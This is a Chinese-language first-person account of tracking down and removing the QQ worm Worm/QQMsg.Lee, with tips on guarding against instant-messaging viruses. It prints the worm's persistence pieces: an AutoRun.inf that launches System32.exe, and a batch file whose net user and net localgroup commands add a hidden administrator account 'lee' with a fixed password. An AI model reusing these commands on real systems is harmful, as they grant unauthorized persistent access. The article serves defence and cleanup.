自啟動病毒QQ樂Worm/QQMsg查殺實戰

筆者最近遇到一個采取另類方式啟動的病毒——QQ樂(Worm/QQMsg.Lee)，現把一波三折的查殺過程和一些經驗寫出來，供朋友們參考。

某日在QQ裡連續收到一位朋友發來的消息，該消息中都帶有一串網址，經證實並不是他主動發來的，於是懷疑他的電腦中了病毒。筆者首先打開金山網镖防火牆，檢查發現一個正在訪問網絡的可疑程序“System32.exe”，通過名字可以看出它是想與System32文件夾相混淆，於是點擊右上角的“結束進程”殺掉它。然後按圖索骥到C盤根目錄下找到並刪除它，接著打開了注冊表編輯器。因為一般木馬和病毒都喜歡在這裡添加自啟動鍵值，但是檢查了所有以RUN為開頭的項都沒有與這個文件相關聯的啟動項，看來這個病毒十分狡猾。

接著在資源管理器中檢查Win.ini和System.ini，因為有些病毒會在Win.ini中的[Windows]小節下的load和run字段後面，以及System.ini中的[boot]小節的Shell=Explorer.exe後面添加啟動項，以便每次開機時自動運行。誰知這些地方仍然一無所獲，不過卻意外發現系統中多出了一個管理員賬戶“Lee”，懷疑是病毒添加的，於是刪除它。

正在筆者為找不到毒源而納悶時，進程中又重新出現了病毒文件“System32.exe”，而且被刪除的賬戶也重新恢復。看來如果不找到病毒的啟動機制，就難以徹底制服它。於是筆者打開“搜索”，在“文件中的一個字或詞組”(這裡可以搜索文件內部的內容)一欄中輸入“System32.exe”，經過一番等待，在搜索結果中發現了數個“AutoRun.inf”文件，用記事本打開它，內容為:

[autorun]

open=System32.exe

原來病毒自啟動的根源在這兒。感染病毒後它會在每個分區的根目錄下創建Autorun.inf文件和病毒體System32.exe、System32dll.dll，5自學網，使得每次雙擊盤符打開時病毒都會自動運行(原理與自啟動光盤相同)，這種方法確實比在注冊表中添加啟動項更不容易被發現。筆者接著又利用前面的搜索方法，查找“Lee”這個關鍵字，結果發現了一個自動創建管理員賬戶的批處理文件“Admin.bat”。用記事本打開它，內容如下:

net user lee abcd1234!@# /add

net localgroup administrators lee /add

通過內容可以看出病毒是要增加一個名為lee，密碼為abcd1234!@#的新賬戶，5自學網，然後將它加入管理員組中(即賦予管理員權限)。毒根找到了，下面就可以大開“殺戒”了，把找到的這些文件統統刪除。

IM病毒防范技巧:

1. 用QQ等即時通訊工具聊天時，除了開啟病毒和網絡防火牆以外，還要打開嵌入式防火牆，例如金山毒霸6中的“騰訊QQ、MSN Messenger、ICQ安全助手”。至少要把金山網镖等防火牆的安全級別設置到中以上，才能更有效攔截木馬程序和網絡攻擊。

2. 不要隨意點擊QQ中的鏈接，因為許多病毒都會偽裝成網頁鏈接，並通過消息中具有欺騙和誘惑的文字讓你去點擊，例如QQ小尾巴。